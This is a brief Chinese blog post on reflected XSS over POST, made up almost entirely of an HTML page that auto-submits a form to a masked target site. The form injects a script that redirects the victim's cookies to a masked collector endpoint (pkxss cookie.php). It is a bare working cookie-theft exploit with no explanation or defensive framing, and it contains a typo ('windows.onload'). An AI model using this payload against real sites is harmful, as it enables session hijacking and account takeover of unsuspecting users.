路漫漫其修远兮,吾将上下而求索

导航

反射型XSS(POST方式)

反射型XSS(POST方式)

 

<html>
<head>
<script>
windows.onload = function(){
    document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="https://**.com/**.htm">
    <input id= "xssr_in" type="text"  name="message" value=
    "<script>
document.location = 'http://****/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
    </script>"
    />
    <input id="postsubmit" type="submit" name="submit" value="submit" />

</form>
</body>
</html>

 

posted on 2021-03-05 01:36  爱在西元间  阅读(531)  评论(0编辑  收藏  举报